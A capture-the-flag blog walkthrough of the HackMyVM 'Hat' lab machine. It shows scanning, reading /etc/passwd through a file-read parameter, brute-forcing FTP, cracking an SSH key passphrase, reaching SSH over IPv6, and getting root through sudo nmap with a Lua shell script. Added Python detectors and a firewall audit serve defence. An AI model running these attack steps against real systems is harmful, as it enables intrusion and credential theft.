Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Hat Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Hat

Key points: IPv6

Scan all ports with Nmap.

 nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.0012s latency).
 Not shown: 65532 closed ports
 PORT      STATE    SERVICE VERSION
 22/tcp    filtered ssh
 80/tcp    open     http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 65535/tcp open     ftp     pyftpdlib 1.5.4
 | ftp-syst:
 |   STAT:
 | FTP server status:
 |  Connected to: 192.168.56.100:65535
 |  Waiting for username.
 |  TYPE: ASCII; STRUcture: File; MODE: Stream
 |  Data connection closed.
 |_End of status.

Scan port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.html           (Status: 200) [Size: 10701]
 /logs                 (Status: 301) [Size: 315] [--> http://192.168.56.100/logs/]
 /php-scripts          (Status: 301) [Size: 322] [--> http://192.168.56.100/php-scripts/]

Scan php-scripts; file.php is found.

 ~ gobuster dir -u http://192.168.56.100/php-scripts -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o scripts.log
 /index.html           (Status: 200) [Size: 7]
 /file.php             (Status: 200) [Size: 0]

Fuzz the parameter name of file.php.

 ~ wfuzz -u 'http://192.168.56.100/php-scripts/file.php?FUZZ=/etc/passwd'    -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0           
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000713:   200        26 L     38 W       1404 Ch     "6"      

Read /etc/passwd to get the user name.

 ~ curl 'http://192.168.56.100/php-scripts/file.php?6=/etc/passwd'      
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin            
 ...
 cromiphi:x:1000:1000:cromiphi,,,:/home/cromiphi:/bin/bash
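
The fuzzing step above leaves a very recognisable footprint in the web server's access log: many requests to the same script, each with a different parameter name and the same sensitive value. The detector below is an added example (not part of the original post) that scans constructed Apache access-log lines for file-inclusion style values and for parameter-name fuzzing against one path.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache access-log lines (not from the original post): a burst of
# parameter-name fuzzing against file.php followed by the successful read.
ACCESS_LOG = """\
192.168.56.150 - - [13/Oct/2021:15:10:01 +0800] "GET /php-scripts/file.php?id=/etc/passwd HTTP/1.1" 200 0
192.168.56.150 - - [13/Oct/2021:15:10:01 +0800] "GET /php-scripts/file.php?page=/etc/passwd HTTP/1.1" 200 0
192.168.56.150 - - [13/Oct/2021:15:10:01 +0800] "GET /php-scripts/file.php?file=/etc/passwd HTTP/1.1" 200 0
192.168.56.150 - - [13/Oct/2021:15:10:02 +0800] "GET /php-scripts/file.php?6=/etc/passwd HTTP/1.1" 200 1404
192.168.56.1 - - [13/Oct/2021:15:11:09 +0800] "GET /index.html HTTP/1.1" 200 10701
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\d+)')
# Values that never legitimately arrive in a query parameter of a normal page.
SENSITIVE_RE = re.compile(r'(\.\./|/etc/passwd|/etc/shadow|/proc/self|php://|expect://)', re.I)

def analyse(log_text, fuzz_threshold=3):
    """Return (hits, fuzzing): hits are requests carrying a file-inclusion style
    value; fuzzing lists (ip, path) pairs that tried at least fuzz_threshold
    distinct parameter names, the footprint of tools such as wfuzz."""
    hits = []
    names = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m['target'])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            names[(m['ip'], parts.path)].add(name)
            if SENSITIVE_RE.search(value):
                # A non-empty body on such a request means the read likely worked.
                hits.append({'ip': m['ip'], 'path': parts.path, 'param': name,
                             'value': value, 'leaked': int(m['size']) > 0})
    fuzzing = [key for key, n in names.items() if len(n) >= fuzz_threshold]
    return hits, fuzzing
```

The `leaked` flag separates the guessed parameter names (empty 200 responses, as in the wfuzz output) from the one that actually returned the file.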

Scan the logs folder. The FTP user name is found in vsftpd.log.

 ~ gobuster dir -u http://192.168.56.100/logs -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,log -b 401,403,404,500 --wildcard   -o logs.log
  ...
  ===============================================================
 /index.html           (Status: 200) [Size: 4]
 /vsftpd.log           (Status: 200) [Size: 1834]

Brute-force the FTP password.

 ~ hydra -l ftp_s3cr3t -P /usr/share/wordlists/rock_ascii.txt -e nsr 192.168.56.100 -s 65535  ftp -t64 -F           ...
 [65535][ftp] host: 192.168.56.100   login: ftp_s3cr3t   password: cowboy

Two files are retrieved from FTP: note and id_rsa.

 ~ cat note                                                                              
 
 Hi,
 
 We have successfully secured some of our most critical protocols ... no more worrying!
 
 
 Sysadmin

Port 22 is filtered: we cannot connect to it directly over IPv4, although the service is running. So let's try IPv6.

Edit /etc/sysctl.conf on the attacking machine to enable IPv6 (disable_ipv6 = 0). An inet6 line in the ifconfig output confirms that IPv6 is enabled.

 ~ cat /etc/sysctl.conf
 ...
 net.ipv6.conf.all.disable_ipv6 = 0
 net.ipv6.conf.default.disable_ipv6 = 0
 net.ipv6.conf.lo.disable_ipv6 = 0
 ~ ifconfig
 ...
 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
         inet 192.168.56.150  netmask 255.255.255.0  broadcast 192.168.56.255
         inet6 fe80::ff1:d602:48fd:2485  prefixlen 64  scopeid 0x20<link>
         ether 00:0c:29:35:d5:69  txqueuelen 1000  (Ethernet)
 ...

Find hosts on the link-local IPv6 network by pinging the all-nodes multicast address ff02::1.

 ~ ping6 -c2 -n -I eth1 ff02::1   
 ping6: Warning: source address might be selected on device other than: eth1
 PING ff02::1(ff02::1) from :: eth1: 56 data bytes
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=1 ttl=64 time=0.033 ms
 64 bytes from fe80::a00:27ff:fe17:10a4%eth1: icmp_seq=1 ttl=64 time=0.615 ms
 64 bytes from fe80::ff1:d602:48fd:2485%eth1: icmp_seq=2 ttl=64 time=0.049 ms

Test whether the machine can be reached over its IPv6 address.

 ~ nmap -p- fe80::a00:27ff:fe17:10a4%eth1 -6     
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-13 15:23 CST
 Nmap scan report for fe80::a00:27ff:fe17:10a4
 Host is up (0.00060s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE
 22/tcp open  ssh
 80/tcp open  http
 ~ curl 'http://[fe80::a00:27ff:fe17:10a4%eth1]/index.html'
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
     <title>Apache2 Debian Default Page: It works</title>
     <style type="text/css" media="screen">
 ...
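
The root cause here is a firewall that drops SSH for IPv4 only, while ip6tables lets the same port through. The audit below is an added example (not the post's own code) that compares constructed iptables-save and ip6tables-save dumps, reports ports blocked in one family but not the other, and emits the ip6tables rules that would close the gap.

```python
import re

# Constructed iptables-save / ip6tables-save dumps (not from the original post)
# reproducing the situation on the box: SSH dropped on IPv4 only.
IPTABLES_V4 = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -p tcp -m tcp --dport 3306 -j REJECT --reject-with tcp-reset
COMMIT
"""
IPTABLES_V6 = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 3306 -j REJECT --reject-with tcp6-adm-prohibited
COMMIT
"""

# An INPUT rule in the filter table that drops or rejects a destination port.
RULE_RE = re.compile(r'^-A INPUT .*--dport (\d+) .*-j (DROP|REJECT)')

def blocked_ports(dump):
    """Set of TCP/UDP ports that the filter table's INPUT chain blocks."""
    ports = set()
    in_filter = False
    for line in dump.splitlines():
        if line.startswith('*'):          # table header, e.g. *filter or *nat
            in_filter = line == '*filter'
            continue
        m = RULE_RE.match(line) if in_filter else None
        if m:
            ports.add(int(m.group(1)))
    return ports

def ipv6_gaps(v4_dump, v6_dump):
    """Ports blocked for one address family but reachable over the other."""
    v4, v6 = blocked_ports(v4_dump), blocked_ports(v6_dump)
    return {'missing_in_v6': sorted(v4 - v6), 'missing_in_v4': sorted(v6 - v4)}

def ip6tables_fix(ports):
    """ip6tables rules that mirror the IPv4 drops, one per missing port."""
    return [f'-A INPUT -p tcp -m tcp --dport {p} -j DROP' for p in ports]
```

On a real host feed it the output of `iptables-save` and `ip6tables-save`, or simply disable IPv6 on the box if nothing needs it.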

Crack the passphrase of id_rsa.

 $ python2 /usr/share/john/ssh2john.py id_rsa  > crack.txt
 $ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
 Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
 Cost 2 (iteration count) is 2 for all loaded hashes
 Will run 2 OpenMP threads
 Note: This format may emit false positives, so it will keep trying even after
 finding a possible candidate.
 Press 'q' or Ctrl-C to abort, almost any other key for status
 ilovemyself      (id_rsa)
 1g 0:00:00:11 46.01% (ETA: 20:23:54) 0.09082g/s 607973p/s 607973c/s 607973C/s katim03..katilsimbu_1
 Session aborted

Log in over SSH via IPv6.

 ~ ssh cromiphi@fe80::a00:27ff:fe17:10a4%eth1 -i id_rsa    
 Enter passphrase for key 'id_rsa':
 Linux Hat 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/cromiphi/.Xauthority does not exist
 cromiphi@Hat:~$

Check sudo -l.

 cromiphi@Hat:~$ sudo -l
 Matching Defaults entries for cromiphi on Hat:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User cromiphi may run the following commands on Hat:
     (root) NOPASSWD: /usr/bin/nmap

Get root.

 cromiphi@Hat:~$ echo 'os.execute("/bin/bash -i")' > exp
 cromiphi@Hat:~$ sudo nmap --script=exp
 Starting Nmap 7.70 ( https://nmap.org ) at 2021-10-13 10:38 CEST
 NSE: Warning: Loading 'exp' -- the recommended file extension is '.nse'.
 root@Hat:/home/cromiphi# uid=0(root) gid=0(root) grupos=0(root)
 Hat
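
Any `--script` argument to a root-level nmap is user-supplied Lua running as root, which is exactly what the sudoers entry above hands out. The detector below is an added example (not the post's own code) that reads constructed auth.log sudo entries and flags nmap runs whose NSE script is not in a stock inventory; the STOCK_SCRIPTS set is a constructed stand-in for the names under /usr/share/nmap/scripts.

```python
import re
import os.path

# Constructed /var/log/auth.log sudo entries (not from the original post); the
# third line reproduces the escalation shown above.
AUTH_LOG = """\
Oct 13 10:30:11 Hat sudo: cromiphi : TTY=pts/0 ; PWD=/home/cromiphi ; USER=root ; COMMAND=/usr/bin/nmap -sV 192.168.56.1
Oct 13 10:31:40 Hat sudo: cromiphi : TTY=pts/0 ; PWD=/home/cromiphi ; USER=root ; COMMAND=/usr/bin/nmap --script=http-title 192.168.56.1
Oct 13 10:38:02 Hat sudo: cromiphi : TTY=pts/0 ; PWD=/home/cromiphi ; USER=root ; COMMAND=/usr/bin/nmap --script=exp
Oct 13 10:39:15 Hat sudo: cromiphi : TTY=pts/0 ; PWD=/home/cromiphi ; USER=root ; COMMAND=/usr/bin/nmap --script /tmp/x.nse,ftp-anon 127.0.0.1
"""

SUDO_RE = re.compile(r'sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$')

# Constructed stand-in for the stock NSE inventory; on a real host build it from
# the file names under /usr/share/nmap/scripts plus the category names.
STOCK_SCRIPTS = {'http-title', 'ftp-anon', 'default', 'safe', 'vuln'}

def script_args(argv):
    """Every value handed to --script, in both --script=a,b and --script a,b forms."""
    for i, a in enumerate(argv):
        if a.startswith('--script='):
            yield from a.split('=', 1)[1].split(',')
        elif a == '--script' and i + 1 < len(argv):
            yield from argv[i + 1].split(',')

def suspicious_nmap_sudo(log_text, stock=STOCK_SCRIPTS):
    """Return (user, script) pairs for root-level nmap runs that load an NSE
    script outside the stock inventory. Stock scripts are referenced by name or
    category and never carry a path, so anything containing '/' is flagged."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m or m['runas'] != 'root':
            continue
        argv = m['cmd'].split()
        if not argv or os.path.basename(argv[0]) != 'nmap':
            continue
        for s in script_args(argv[1:]):
            name = s[:-4] if s.endswith('.nse') else s
            if '/' in s or name not in stock:
                findings.append((m['user'], s))
    return findings
```

The durable fix is to drop the NOPASSWD nmap entry from sudoers altogether; the log check is for catching the abuse while such entries still exist.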

